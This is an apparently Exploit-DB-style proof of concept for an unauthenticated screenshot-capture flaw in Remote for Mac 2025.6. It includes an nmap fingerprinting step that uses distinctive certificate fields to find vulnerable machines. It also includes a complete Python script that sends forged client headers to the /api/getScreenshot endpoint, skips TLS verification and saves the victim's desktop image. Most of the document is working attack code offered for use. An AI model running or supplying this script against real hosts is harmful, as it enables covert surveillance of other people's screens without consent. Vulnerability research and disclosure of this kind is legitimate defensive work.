# Exploit Title: Remote for Mac 2025.6 -  Unauthenticated Desktop
Screenshot Capture
# Date: 2025-05-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6

'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Mac application
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with Subject:
commonName=SecureHTTPServer/organizationName=Deusty Designs,
LLC/stateOrProvinceName=Missouri/countryName=US
'''

#!/usr/bin/env python3

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def capture_screenshot(ip, port, output_file):
    try:
        response = requests.get(
            f"https://{ip}:{port}/api/getScreenshot",
            headers={
                "X-ClientToken": "123456",
                "X-HostName": "apple iMac",
                "X-HostFullModel": "iMac17,1"
            },
            verify=False,
            timeout=15
        )
        if response.status_code == 200 and
response.content.startswith(b'\xff\xd8'):
            with open(output_file, 'wb') as f:
                f.write(response.content)
            print(f"[+] Saved: {output_file}")
            return True
        print(f"[-] Failed: HTTP {response.status_code}")
        print(response.content)
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
        sys.exit(1)
    sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)